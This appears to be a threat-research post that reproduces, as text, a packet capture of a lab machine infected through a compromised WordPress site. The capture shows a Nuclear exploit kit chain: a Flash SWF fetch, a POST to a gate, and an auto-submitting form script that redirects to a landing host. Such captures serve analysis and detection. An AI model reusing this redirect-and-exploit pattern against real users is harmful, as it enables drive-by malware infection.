Nuclear Exploit Kit with Callbacks PCAP Converted Traffic Sample

By | June 22, 2015

2015-02-04 11:51:34.092279 IP 192.168.221.134.63245 > 192.168.221.2.53: 19334+ A? www.clearimagedevices[.]com. (43)
E..GU-……………..5.3LcK…………www.clearimagedevices[.]com…..
2015-02-04 11:51:34.135718 IP 192.168.221.2.53 > 192.168.221.134.63245: 19334 1/0/0 A 64.9.192.3 (59)
E..W.!……………5…C..K…………www.clearimagedevices[.]com……………..@ ..
2015-02-04 11:51:34.139407 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [S], seq 2253522424, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U/@….Y….@ …..P.R…….. ._]…………..
2015-02-04 11:51:34.242046 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [S.], seq 3104561041, ack 2253522425, win 64240, options [mss 1460], length 0
E..,.”…..m@ …….P…….R..`………….
2015-02-04 11:51:34.242202 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [.], ack 1, win 64240, length 0
E..(U0@….d….@ …..P.R……P…4………
2015-02-04 11:51:34.244155 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 1:685, ack 1, win 64240, length 684
E…U1@………@ …..P.R……P…R…GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google[.]com/url?url=http://www.clearimagedevices[.]com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=_j_SVNj8A7aOsQSep4CoCA&ved=0CBgQFjAA&usg=AFQjCNGhlESOpeUlh_svL7dp3-Y8wzYbUw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:34.244363 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 685, win 64240, length 0
E..(.#…..p@ …….P…….R..P…1………
2015-02-04 11:51:34.870670 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 1:1356, ack 685, win 64240, length 1355
E..s.$…..$@ …….P…….R..P…_m..HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.4.24
X-Pingback: http://www.clearimagedevices[.]com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:32 GMT
Content-Length: 36259
2015-02-04 11:51:35.326482 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [.], ack 43358, win 64240, length 0
E..(Uj@….*….@ …..P.R……P….0……..
2015-02-04 11:51:35.327599 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 1534:1953, ack 43358, win 64240, length 419
E…Uk@………@ …..P.R……P…….GET /wp-content/plugins/google-calendar-events/js/jquery-qtip.js HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:35.327707 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 1953, win 64240, length 0
E..(……..@ …….P…….R..P………….
2015-02-04 11:51:35.427957 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 43358:44713, ack 1953, win 64240, length 1355
E..s……..@ …….P…….R..P…#6..HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Aug 2014 13:33:28 GMT
Accept-Ranges: bytes
ETag: “1f305d7cfbc1cf1:0”
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:32 GMT
Content-Length: 38442

/*!
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks[.]com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Launch : February 2009
* Version : 1.0.0-rc3
* Released: Tuesday 12th May, 2009 – 00:00
* Debug: jquery.qtip.debug.js
2015-02-04 11:51:36.233188 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 1953:2342, ack 82064, win 64240, length 389
E…U.@….6….@ …..P.R…..!P…….GET /?mcsf_action=main_css&ver=4.1 HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.233287 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 2342, win 64240, length 0
E..(……..@ …….P…..!.R..P………….
2015-02-04 11:51:36.470090 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 82064:83419, ack 2342, win 64240, length 1355
E..s…….X@ …….P…..!.R..P…….HTTP/1.1 200 OK
Content-Type: text/css
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.4.24
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:33 GMT
Content-Length: 1192
2015-02-04 11:51:36.523801 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 2342:2760, ack 83434, win 62870, length 418
E…U.@………@ …..P.R…..{P…v…GET /wp-content/themes/u-design/fonts/league_gothic-webfont.eot HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.523938 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 2760, win 64240, length 0
E..(……..@ …….P…..{.R..P………….
2015-02-04 11:51:36.635816 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 83434:84789, ack 2760, win 64240, length 1355
E..s.
…..>@ …….P…..{.R..P…
%..HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: “8da74c8bc494cf1:0”
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:33 GMT
Content-Length: 20451
2015-02-04 11:51:36.767766 IP 192.168.221.134.50416 > 104.207.224.17.80: Flags [P.], seq 1:414, ack 1, win 64240, length 413
E…V @………h……P.’s…..P…….GET /c2e1276ab796e512a567123b9d44aeb5.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.clearimagedevices[.]com/
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: serpsite[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.774962 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 2760:3138, ack 104149, win 64240, length 378
E…V#@………@ …..P.R….nfP…8Q..GET /images/button2.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.775064 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 3138, win 64240, length 0
E..(.R…..A@ …….P….nf.R.:P….t……..
2015-02-04 11:51:36.834835 IP 104.207.224.17.80 > 192.168.221.134.50416: Flags [P.], seq 1:1233, ack 414, win 64240, length 1232
E….[….].h……..P…….’t.P….U..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:34 GMT
Server: Apache
Last-Modified: Tue, 16 Dec 2014 13:12:20 GMT
ETag: “3ae-50a551be45500″
Accept-Ranges: bytes
Content-Length: 942
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-shockwave-flash

CWS ….x.}T.r.4…….I.VM..,tY…Nb’..0]`..N.ma.i..-.f.;.N.}……..}..DE^..fa.xt….;.9….5.._..C.|.
.8…..l…….~Y…s.{W….c.@.h………..K…..Ea…..c/.f…_&7!;..Y……]…..M.1.>..k…`…..Q……fr…….o9.R’bY.w=kd..3d}.2L..i.A5…..w.1.._….;.|…………G.S:e:N..s..
W.U.]j…7….\…A.1….:}….&I.D .Xz…2..V…Q….^.z….d…b..k..s.a..q.\..a….Q.$.B’….^b,M.4{.nX.gk…’.i….Uyb…Y2….y!]…a.s_/…,g…..VKw….=…..h{..’..vs…irv.
>/….s..$..o…U.Y..@.<.a%q..D..-..W.).i..,.J….9E>…Gs..;…x…k..&..9.Lx….X…..:C. .a…4..A..Gk…..{…,o….r……w…X].I.#….P.”.n.-B.6…..].G…9$]..|…….X.H}.~.>..1.BIVjB…l…..-.]….{…].., .0’bQ…Q.K………:F…….P.P.A..(.
.g…0.aQ….S..`a….&.F..? … .J..e.H….
…P@m..@. gA(+….[H…mR[.u……6..A+…C..T&.C..H..J.k/….t%..A.ldc..s.n.Y.[.l#Jl..1…p..w..Y(27….\….z.S……Bc.V5{W..4{_..4.P……..@N…..SY>z.+……..r.
2015-02-04 11:51:36.935456 IP 104.207.224.17.80 > 192.168.221.134.50416: Flags [P.], seq 1:1233, ack 414, win 64240, length 1232
E….k….].h……..P…….’t.P….U..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:34 GMT
Server: Apache
Last-Modified: Tue, 16 Dec 2014 13:12:20 GMT
ETag: “3ae-50a551be45500”
Accept-Ranges: bytes
Content-Length: 942
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-shockwave-flash
2015-02-04 11:51:38.402469 IP 192.168.221.134.50418 > 66.96.133.6.80: Flags [P.], seq 1:731, ack 1, win 64240, length 730
E…VN@…<…..B`…..P.M……P…….POST /b685cf9fdc885f90abbb39b13022d1c4.php?q=072ac022371c7b35b84aac33ec1dae96 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
Referer: http://serpsite[.]com/c2e1276ab796e512a567123b9d44aeb5.swf
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: canadahalalec[.]com
Content-Length: 335
Connection: Keep-Alive
Cache-Control: no-cache
2015-02-04 11:51:38.402564 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [.], ack 731, win 64240, length 0
E..(……..B`…….P…….M .P………….
2015-02-04 11:51:38.402570 IP 192.168.221.134.50418 > 66.96.133.6.80: Flags [P.], seq 731:1066, ack 1, win 64240, length 335
E..wVO@…=…..B`…..P.M …..P…….ip=7QqvDotmyXP1vjJQ&ua=tlP7Vt89hmr1vjdAW8YqmDT%2FsGFiyxROsPBX45R6HxinEeZC%2BYGrgEA0mmA3NDIJUYzgWXCjQvX0Bz9J7EQJgwkNd6BPfJHRPQDLeAbXKoyZ1AF3ZlM9iUoAREe61Uect0rMRTVcywggs9Gi6vlATKjsE8rl4JFYd32k4Zp8n8vryMmzxpW4CE22uM0hgUyJ%2BRpdvugXWsf1qsm4dxE%3D&furl=s0j1T4l%2ByD%2B58ykNGtM8liHz6mtvyl4wxth0z6ccYWHvTaR9wbqXq1B34kYCQmdjC9iDbXinWqm7Sic%3D
2015-02-04 11:51:38.402643 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [.], ack 1066, win 64240, length 0
2015-02-04 11:51:38.418730 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 3138:3564, ack 122546, win 64240, length 426
E…VS@………@ …..P.R.:…CP….A..GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.3 HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.418825 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 3564, win 64240, length 0
E..(……..@ …….P…..C.R..P…G………
2015-02-04 11:51:38.509596 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], seq 122546:124006, ack 3564, win 64240, length 1460
E………..@ …….P…..C.R..P…….HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 16 Jan 2015 14:54:09 GMT
Accept-Ranges: bytes
ETag: “aeab8c489c31d01:0”
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 9658
2015-02-04 11:51:38.514841 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 3564:3996, ack 132467, win 63804, length 432
E…Vm@….w….@ …..P.R……P..<….GET /wp-content/themes/u-design/styles/style1/images/textured_background1.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.514967 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 3996, win 64240, length 0
E..(……..@ …….P…….R..P….|……..
2015-02-04 11:51:38.609633 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 132467:133822, ack 3996, win 64240, length 1355
E..s…….1@ …….P…….R..P….’..HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: “291e438bc494cf1:0”
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 19454

.PNG
.2015-02-04 11:51:38.683814 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 3996:4428, ack 152170, win 64240, length 432
E…V.@….B….@ …..P.R….).P…~…GET /wp-content/themes/u-design/scripts/superfish-1.4.8/images/sf-menu-bg.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.683895 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 4428, win 64240, length 0
E..(.c…..0@ …….P….)..R.DP………….
2015-02-04 11:51:38.701764 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [P.], seq 1:525, ack 1066, win 64240, length 524
E..4.m……B`…….P…….M”AP….S..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:36 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT

<form id=’myLink’ action=’http://zxc.mivycem[.]com/EVEPEVFFWxgbHQUXDg0XHAVcDkoCCgs.html’ method=’GET’></form><script>document.getElementById(‘myLink’).submit();</script>
2015-02-04 11:51:38.712931 IP 192.168.221.134.57458 > 192.168.221.2.53: 3140+ A? zxc.mivycem[.]com. (33)
E..=V……-………r.5.).r.D………..zxc.mivycem[.]com…..
2015-02-04 11:51:38.748992 IP 192.168.221.2.53 > 192.168.221.134.57458: 3140 1/0/0 A 5.9.120.123 (49)
E..M…….A………5.r.9x..D………..zxc.mivycem[.]com……………… x{
2015-02-04 11:51:38.750960 IP 192.168.221.134.50421 > 5.9.120.123.80: Flags [S], seq 4104030343, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4V.@….^….. x{…P………. ……………..
2015-02-04 11:51:38.756695 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 152170:153525, ack 4428, win 64240, length 1355
E..s……..@ …….P….)..R.DP….U..HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: “98ce538bc494cf1:0”
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 2055

.PNG
.
….IHDR…….\……..-….tEXtSoftware.Adobe ImageReadyq.e<….IDATx….j.@.@….\…..; “j.wf:..X……I^p..m./..|..q.c.C.s..<../.<,..<.<M.MlB.4!.V…t
u……..nO N..<m.N.V?….3..<..y…..u*.N……..\…’…S.L..up…g.s..):..f.I..S..h}.<.\7.^..v.M………o…vIt.X,>..>……JpnF.p8$..`…a………j……@x.@x……………@x.@x……………@x.@x……………@x.@x………………….@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x……………@x…..@x.@x……………@x.@x……………@
2015-02-04 11:51:38.761111 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 153525:154473, ack 4428, win 64240, length 948
E……….V@ …….P…./F.R.DP….d..x.@x……………@x.@x………………….@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x……………@x…..@x.@x……………@x.@x……………@x.@x……………@x.@x………………….@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x……………………….l..,.K….’…e%…..IEND.B`.
2015-02-04 11:51:38.787477 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [.], ack 154473, win 64240, length 0
E..(V.@………@ …..P.R.D..2.P………….
2015-02-04 11:51:38.801782 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [P.], seq 1:525, ack 1066, win 64240, length 524
E..4……..B`…….P…….M”AP….S..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:36 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT

<form id=’myLink’ action=’http://zxc.mivycem[.]com/EVEPEVFFWxgbHQUXDg0XHAVcDkoCCgs.html’ method=’GET’></form><script>document.getElementById(‘myLink’).submit();</script>
2015-02-04 11:51:38.802710 IP 192.168.221.134.50418 > 66.96.133.6.80: Flags [.], ack 525, win 63716, length 0
E..(V.@…>~….B`…..P.M”A….P………….
2015-02-04 11:51:38.848453 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 4428:4853, ack 154473, win 64240, length 425
E…V.@….,….@ …..P.R.D..2.P…….GET /wp-content/themes/u-design/styles/common-images/dark-button-l.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.848575 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 4853, win 64240, length 0
E..(……..@ …….P….2..R..P….,……..
2015-02-04 11:51:38.892198 IP 5.9.120.123.80 > 192.168.221.134.50421: Flags [S.], seq 1913677619, ack 4104030344, win 64240, options [mss 1460], length 0
E..,……,`. x{…..P..r.g3….`…e………
2015-02-04 11:51:38.899975 IP 192.168.221.134.50421 > 5.9.120.123.80: Flags [.], ack 1, win 64240, length 0
E..(V.@….Q….. x{…P….r.g4P…}~……..
2015-02-04 11:51:38.911167 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 154473:155080, ack 4853, win 64240, length 607
E……….r@ …….P….2..R..P…y…HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: “8280458bc494cf1:0”
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 360

Share Button